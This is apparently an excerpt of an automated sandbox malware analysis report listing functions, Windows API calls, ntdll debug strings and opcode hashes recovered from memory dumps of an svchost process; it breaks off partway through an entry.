
LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175A5

Memory Dump Source

Source File: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 122ffa95bd0675b8eb95325ccf80ee11964f9fc8d856f2a989d7b826c59a4d4e
Instruction ID: e0d839ce48a3ca4d40d25c93d4340ee9ed0203ab598bdf485ea187b7dfb12019
Opcode Fuzzy Hash: 122ffa95bd0675b8eb95325ccf80ee11964f9fc8d856f2a989d7b826c59a4d4e
Instruction Fuzzy Hash: BF015EB1E0420DBBDB10DAE1DC42FDEB3789B54308F4081AAED0897240F635EB588B95

Function 0042C393 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C3C4

Memory Dump Source

Source File: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 35b72566180eabb0bfa8a9aac645b65b65562664edf51f15ac0a20c3acdc79a8
Instruction ID: c31bd505a3e9c5f79ee474045fae06e2bfeb5dd3600cc2c78ec973ac03e66ba6
Opcode Fuzzy Hash: 35b72566180eabb0bfa8a9aac645b65b65562664edf51f15ac0a20c3acdc79a8
Instruction Fuzzy Hash: 8AE02C322002103BE220FA5ADC01FCB736CCFC5318F00801AFA08A7281C6B4B90087F0

Function 02F735C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02F735CA

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9d2bcd9b88abda25324e0edd6ff924dd608e281e2d624ddd933cca78999155c8
Instruction ID: beaba43f15038fe404dcefd8247ed03cd40434f147cb36a71058e707b6bc84a3
Opcode Fuzzy Hash: 9d2bcd9b88abda25324e0edd6ff924dd608e281e2d624ddd933cca78999155c8
Instruction Fuzzy Hash: FD90023160550812D20071588554707500687D0381FA5C411A142456CD87A58A5165A2

Function 02F72B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02F72B6A

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6d1a49e6fb1a0ff63c62624b3b9492c02b2f1feb30d19c74b6ff8a846dc3efe6
Instruction ID: abecfa306faa3e29507cd3b0aa347f5075b0835d871d978d25eee6376dabb3ae
Opcode Fuzzy Hash: 6d1a49e6fb1a0ff63c62624b3b9492c02b2f1feb30d19c74b6ff8a846dc3efe6
Instruction Fuzzy Hash: A290026120240413420571588454617800B87E0381B95C021E2014594DC53589916125

Function 02F72DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02F72DFA

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8b5e68afd370d91e70774a66adf9ff5b14829121f8a7127d5fe667a6e79da49a
Instruction ID: f8647b987277b5e1fe2c3cb6e3ce21ea601829a728dca3b6dee3092c34553caf
Opcode Fuzzy Hash: 8b5e68afd370d91e70774a66adf9ff5b14829121f8a7127d5fe667a6e79da49a
Instruction Fuzzy Hash: 9190023120140823D21171588544707400A87D03C1FD5C412A142455CD96668A52A121

Function 004183A3 Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 887d7119426daa8ef3bb6c5b0ad173ad032735e69f5dfed6ede48bf960fc58ac
Instruction ID: 7bd34890fc182a34b8ac80a809dfdcea7981016ebea8598659baa8f829c72bfe
Opcode Fuzzy Hash: 887d7119426daa8ef3bb6c5b0ad173ad032735e69f5dfed6ede48bf960fc58ac
Instruction Fuzzy Hash: D2F1A170E0021AAFDB24DF65DC81AEEB778EF44304F1481AEE519A7341DB745A81CF95

Function 00413D5F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(-2-48L,00000111,00000000,00000000), ref: 00413DFA

Strings

-2-48L, xrefs: 00413DEF, 00413DF9, 00413E0A
-2-48L, xrefs: 00413E01, 00413E04

Memory Dump Source

Source File: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: -2-48L$-2-48L
API String ID: 1836367815-2249325318
Opcode ID: a9a21f4e8521d095bc6559e03131e75052bf61225c1c0240376f6ec473641f72
Instruction ID: 7e5ba7aed84221544fd27d2c7def42a304fe6654307a2087436acf6f34f399ef
Opcode Fuzzy Hash: a9a21f4e8521d095bc6559e03131e75052bf61225c1c0240376f6ec473641f72
Instruction Fuzzy Hash: 69115972E0120C3ADB019A95AC82DEFBB7CDF81764F40819AFA1467240D2794F428BA5

Function 00413D83 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(-2-48L,00000111,00000000,00000000), ref: 00413DFA

Strings

-2-48L, xrefs: 00413DEF, 00413DF9, 00413E0A
-2-48L, xrefs: 00413E01, 00413E04

Memory Dump Source

Source File: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: -2-48L$-2-48L
API String ID: 1836367815-2249325318
Opcode ID: ae08f9b957d9fad555f4d70aa2c1894691647f92be8e3fd0214c99e4360f46ae
Instruction ID: b8a5b5c0afb51680df5a66c9583b9c779fe3d94d557225da3b921dcb12173fa8
Opcode Fuzzy Hash: ae08f9b957d9fad555f4d70aa2c1894691647f92be8e3fd0214c99e4360f46ae
Instruction Fuzzy Hash: FE01C4B1E0121C7AEB01AAE19C82DEF7B7CDF41798F418069FA1477241E6B85F064BE5

Function 00413D55 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(-2-48L,00000111,00000000,00000000), ref: 00413DFA

Strings

-2-48L, xrefs: 00413DEF, 00413DF9, 00413E0A
-2-48L, xrefs: 00413E01, 00413E04

Memory Dump Source

Source File: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: -2-48L$-2-48L
API String ID: 1836367815-2249325318
Opcode ID: 3eee551304d342dd5ef9b3cb91e90a9ffce1225149198980418f8c014ee336ce
Instruction ID: d5181578410fb9c5d3a38890d3567c8acfc6be5f78b6017bf5dfcee3c5ceeb60
Opcode Fuzzy Hash: 3eee551304d342dd5ef9b3cb91e90a9ffce1225149198980418f8c014ee336ce
Instruction Fuzzy Hash: 16012872E0021876DF00AAA5AC82DEF677CDF80754F41805AFA1077241D67C4F024BE4

Function 0042C6E3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,FEB89D94,00000007,00000000,00000004,00000000,00416DBF,000000F4), ref: 0042C71C

Memory Dump Source

Source File: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: dd8dec6c8b7baae2ada29a0ecf319df77f179855b431f96bd0a620d2595c4ed2
Instruction ID: bfedcac3e6243998be096845260b41f9689e9e3eb705d3e8e942ffe020c5b5f8
Opcode Fuzzy Hash: dd8dec6c8b7baae2ada29a0ecf319df77f179855b431f96bd0a620d2595c4ed2
Instruction Fuzzy Hash: 16E092B52002187BDA10EF4ADC45F9B33ADEFC9714F00401AFA08A7241C770B9108BB5

Function 0042C6A3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E35E,?,?,00000000,?,0041E35E,?,?,?), ref: 0042C6DC

Memory Dump Source

Source File: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 73b04d06e9cc9d06571c888ae0a9447788f46f96137d8274935dcef2e427ba8d
Instruction ID: 29bcb1129819354cb0813b8bf05b0c5091d2f83afad8623f9e9c5b7a5bf13132
Opcode Fuzzy Hash: 73b04d06e9cc9d06571c888ae0a9447788f46f96137d8274935dcef2e427ba8d
Instruction Fuzzy Hash: 0BE06DB16043197FD610EE49EC42E9B33ACEFC9714F004019FA08A7281C670B9108AB5

Function 0042C723 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,F9E93118,?,?,F9E93118), ref: 0042C75A

Memory Dump Source

Source File: 00000001.00000002.1888521898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: ebd067bd81dfec69f88b45784132505cc0604214f8f0df080adf65ae04ae352f
Instruction ID: beee40d13d09765d1e904e2749900fdf892b7c2248eefe31415b741969f1ab67
Opcode Fuzzy Hash: ebd067bd81dfec69f88b45784132505cc0604214f8f0df080adf65ae04ae352f
Instruction Fuzzy Hash: B2E04F752206147BD610BA5AEC41F97776DDFC5714F40441AFA08A7241C6B4B91186E5

Function 02F72C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02F72C24

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 184bf865038148e07317c0bae3c7c7b5d2a4cdcee602ce85a4b9a5f63d8a32f0
Instruction ID: 97d0cb01594f14322433170552f7ac355482eccf788d28f8b9e2194901ae3a93
Opcode Fuzzy Hash: 184bf865038148e07317c0bae3c7c7b5d2a4cdcee602ce85a4b9a5f63d8a32f0
Instruction Fuzzy Hash: E8B09B71D015C5D5DB11F7605A08717790567D0791F55C062D3030645E4738C1D1E175

Non-executed Functions

Function 02FB2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 02FB3187
FrontEndHeapDebugOptions, xrefs: 02FB2489
DisableHeapLookaside, xrefs: 02FB246D
Initializing the application verifier package failed with status 0x%08lx, xrefs: 02FB3176
CFGOptions, xrefs: 02FB2967
DisableExceptionChainValidation, xrefs: 02FB275F
MinimumStackCommitInBytes, xrefs: 02FB2BB0
MaxDeadActivationContexts, xrefs: 02FB2D82
MaxLoaderThreads, xrefs: 02FB24EC
RaiseExceptionOnPossibleDeadlock, xrefs: 02FB2579
@, xrefs: 02FB2942
ExecuteOptions, xrefs: 02FB25A0
GlobalFlag2, xrefs: 02FB2FC0
GlobalFlag, xrefs: 02FB2F3F, 02FB3059
LdrpInitializeExecutionOptions, xrefs: 02FB317D
@, xrefs: 02FB2B74
UseImpersonatedDeviceMap, xrefs: 02FB251C
ShutdownFlags, xrefs: 02FB24A1
TracingFlags, xrefs: 02FB2549
UnloadEventTraceDepth, xrefs: 02FB24C0

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 437c35b5bdd5be92fc2f229b9aaf43e703a35ffdeca18698c12d948185aafa1e
Instruction ID: d6a9da0c1f00ff80492fe26bb52d21d757a90ed930fe9f1001ac927457720835
Opcode Fuzzy Hash: 437c35b5bdd5be92fc2f229b9aaf43e703a35ffdeca18698c12d948185aafa1e
Instruction Fuzzy Hash: 8D928D71A04341ABE722DF26C880BABB7E9BF88794F14491DFB95D7250D770E844CB92

Function 02F268B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 02F89BC3
SE_LdrEntryRemoved, xrefs: 02F269D2
SE_LdrResolveDllName, xrefs: 02F26A2C
SE_InitializeEngine, xrefs: 02F268C5
SE_ShimDllLoaded, xrefs: 02F268F1
SE_ProcessDying, xrefs: 02F269FF
LdrpGetShimEngineInterface, xrefs: 02F89BB9
SE_DllUnloaded, xrefs: 02F269A5
SE_InstallAfterInit, xrefs: 02F2694B
Could not locate procedure "%s" in the shim engine DLL, xrefs: 02F89BB3
SE_GetProcAddressForCaller, xrefs: 02F26A59
apphelp.dll, xrefs: 02F2698A
ApphelpCheckModule, xrefs: 02F26A86
SE_DllLoaded, xrefs: 02F26978
SE_InstallBeforeInit, xrefs: 02F2691E

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-3089669407
Opcode ID: ba2f449edaa325481bd94902db606096d3bd91bef2c24d37acd19474bde0e0ef
Instruction ID: 58ecd40ac95afb106e639d1a80f806e21e9bcf7dfc1239a08c39299cf2d2df3b
Opcode Fuzzy Hash: ba2f449edaa325481bd94902db606096d3bd91bef2c24d37acd19474bde0e0ef
Instruction Fuzzy Hash: 3F8137B2D022196F9B21FBD4DDD1EEEB7BEAB14790B540422BB01F7114D764ED048BA1

Function 02F68620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

undeleted critical section in freed memory, xrefs: 02FA542B
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02FA54E2
8, xrefs: 02FA52E3
Critical section address., xrefs: 02FA5502
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02FA54CE
Invalid debug info address of this critical section, xrefs: 02FA54B6
Thread is in a state in which it cannot own a critical section, xrefs: 02FA5543
double initialized or corrupted critical section, xrefs: 02FA5508
Thread identifier, xrefs: 02FA553A
corrupted critical section, xrefs: 02FA54C2
Critical section address, xrefs: 02FA5425, 02FA54BC, 02FA5534
Critical section debug info address, xrefs: 02FA541F, 02FA552E
Address of the debug info found in the active list., xrefs: 02FA54AE, 02FA54FA
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02FA540A, 02FA5496, 02FA5519

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 17f6ea446a3f0db89406f0c54647d1b040dc70c0ee9f22ac26928c0111c7c3f8
Instruction ID: b78f64a06e516b1b340961b014953f60020cedd0ac94aa48a1eb619f781d26b7
Opcode Fuzzy Hash: 17f6ea446a3f0db89406f0c54647d1b040dc70c0ee9f22ac26928c0111c7c3f8
Instruction Fuzzy Hash: 5F81ACB1E00358AFFB20CF94C945BAEBBB6EB48794FA44119E605B7640C375A944CF60

Function 02F60F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON

Download Yara Rule

Strings

, xrefs: 02F60FEC
%%%u!%s!, xrefs: 02FA14A1
!, xrefs: 02F60FA6
h, xrefs: 02F60FB0
9, xrefs: 02F60F9C
w, xrefs: 02F60FBA
%%%u, xrefs: 02FA14CC
%, xrefs: 02F60F7E
l, xrefs: 02F60FC4
0, xrefs: 02F60F92

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
API String ID: 0-360209818
Opcode ID: 283f891c6f181880f547523fe2da246784608514fa4b8912df203f46c39889d0
Instruction ID: b7551277bbda098fddcc3427731bf96d805025469768733d860c8354a9f676ee
Opcode Fuzzy Hash: 283f891c6f181880f547523fe2da246784608514fa4b8912df203f46c39889d0
Instruction Fuzzy Hash: 2F629FB5E002298FDB24CF18C8507AAB7B6EF95354F5582DAD64DAB280D7325AE1CF40

Function 02FE12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 02FE1706, 02FE1756, 02FE17A8, 02FE1809, 02FE184D, 02FE1895, 02FE18E6
Free Heap block %p modified at %p after it was freed, xrefs: 02FE171B
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 02FE18A5
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 02FE186B
Heap block at %p has incorrect segment offset (%x), xrefs: 02FE181A
HEAP[%wZ]: , xrefs: 02FE16CD, 02FE16F9, 02FE1749, 02FE179B, 02FE17FC, 02FE1840, 02FE18D9
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 02FE176D
Heap block at %p is not last block in segment (%p), xrefs: 02FE17B7
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 02FE18F8

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 13fcea9ee62afc4bfa9bdd5631ab78a58adcf1bc4a2082bdc01f315687d27b31
Instruction ID: 4d0146425bd81bde0eefc854cbf60fb679ceecf8b4d1d3a261bca2c1ff19c1b4
Opcode Fuzzy Hash: 13fcea9ee62afc4bfa9bdd5631ab78a58adcf1bc4a2082bdc01f315687d27b31
Instruction Fuzzy Hash: 3812BE71A00645DFDB268F2AC441BBBB7E2FF09788F148459E69B8B641D734EC84CB50

Function 02F4AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON

Download Yara Rule

Strings

Status: 0x%08lx, xrefs: 02F982D0, 02F983AB
LdrGetDllHandleEx, xrefs: 02F9807C, 02F983B2
minkernel\ntdll\ldrapi.c, xrefs: 02F98086, 02F983BC
LdrpInitializeDllPath, xrefs: 02F980AD
minkernel\ntdll\ldrutil.c, xrefs: 02F980B7
LdrpFindLoadedDllInternal, xrefs: 02F982D7
minkernel\ntdll\ldrfind.c, xrefs: 02F982E1
DLL name: %wZ, xrefs: 02F98075
DLL search path passed in externally: %ws, xrefs: 02F980A6

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
API String ID: 0-3197712848
Opcode ID: d543b6188d35590c9090caa03605292a9a516f3d857e76d7abdc092a5a14d094
Instruction ID: ed18f0a3e0a802f282a2ca5bcfd5b2c59a16b3f734090e645d2a220f90464428
Opcode Fuzzy Hash: d543b6188d35590c9090caa03605292a9a516f3d857e76d7abdc092a5a14d094
Instruction Fuzzy Hash: BE120872A093418BE724DF14C850BAABBE5FF857D8F04061DFB858B291EBB4D944CB52

Function 02F2D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

@, xrefs: 02F2D663
MachinePreferredUILanguages, xrefs: 02F2D685
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 02F2D3B6
@, xrefs: 02F2D49D
@, xrefs: 02F2D3E9
Control Panel\Desktop\MuiCached, xrefs: 02F2D62B
PreferredUILanguagesPending, xrefs: 02F8A8DE
PreferredUILanguages, xrefs: 02F2D4B8, 02F2D4C5
Control Panel\Desktop, xrefs: 02F2D45D

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: 4fc52f30a749ff3081eb146c1429674c1701a8033aebe892267a1aa387cf4949
Instruction ID: 19fd0e2a35c82342fcc592fa0146fd6b43fe9ade9994f9f9938adb015e6e1c2d
Opcode Fuzzy Hash: 4fc52f30a749ff3081eb146c1429674c1701a8033aebe892267a1aa387cf4949
Instruction Fuzzy Hash: 4FB17D729083659FC715DF24C880B6BBBE9EB85798F01492EFA89D7240D770D948CF92

Function 02FE0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 02FE0E61, 02FE0EC2, 02FE0FD5, 02FE105E, 02FE1124, 02FE1178
Tag %04x (%ws) size incorrect (%Ix != %Ix) %p, xrefs: 02FE1192
Number of free blocks in arena (%ld) does not match number in the free lists (%ld), xrefs: 02FE0FE4
Total size of free blocks in arena (%Id) does not match number total in heap header (%Id), xrefs: 02FE106F
HEAP[%wZ]: , xrefs: 02FE0E54, 02FE0EB5, 02FE0FC8, 02FE1051, 02FE1117, 02FE116B
Pseudo Tag %04x size incorrect (%Ix != %Ix) %p, xrefs: 02FE113D
Non-Dedicated free list element %p is out of order, xrefs: 02FE0E6D
dedicated (%04Ix) free list element %p is marked busy, xrefs: 02FE0ED1

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
API String ID: 0-1357697941
Opcode ID: 36abd7d2dcc6af4be90365507a051d57b7b9473fed1964a00725fda66dab5442
Instruction ID: a0edf4a5e766d9506eeb1f1796f03afb009c71a26c97c5c84b5c3e3a35bd0612
Opcode Fuzzy Hash: 36abd7d2dcc6af4be90365507a051d57b7b9473fed1964a00725fda66dab5442
Instruction Fuzzy Hash: 5BF1F271A00295EFDF26DF68C480BAAB7F5FF09788F044059E687A7241CBB4A945CF51

Function 02FC9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

\BaseNamedObjects, xrefs: 02FC949E
%s\%u-%u-%u-%u, xrefs: 02FC9422
AppContainerNamedObjects, xrefs: 02FC946E, 02FC94D6
BaseNamedObjects, xrefs: 02FC9477, 02FC947C
Global\Session\%ld%s, xrefs: 02FC94C5
\AppContainerNamedObjects, xrefs: 02FC94AB, 02FC94B9
%s\%ld\%s, xrefs: 02FC948D
\Sessions, xrefs: 02FC9488

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 0-3063724069
Opcode ID: b1ebce9907bf4b7f9434f25621c6b270cf4739d19199c81c8ca63350021bdfae
Instruction ID: b1aa3fc1eecd4cdc41d2b7343ab9f5b8fd01cebf4fa67ba8c69ebe580878dd38
Opcode Fuzzy Hash: b1ebce9907bf4b7f9434f25621c6b270cf4739d19199c81c8ca63350021bdfae
Instruction Fuzzy Hash: 8CD10472804392ABD721EA64CD40B7BB7E8AF84794F50496DFB84A7290D7B0D9448FD2

Function 02FE0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 02FE03A6, 02FE04B5, 02FE05DD, 02FE0682, 02FE06D9
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 02FE06EA
RtlReAllocateHeap, xrefs: 02FE02BF, 02FE0362
HEAP[%wZ]: , xrefs: 02FE0399, 02FE04A8, 02FE05D0, 02FE0675, 02FE06CC
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 02FE069F
Just reallocated block at %p to %Ix bytes, xrefs: 02FE05F1
About to reallocate block at %p to %Ix bytes, xrefs: 02FE03BA
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 02FE04D3

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
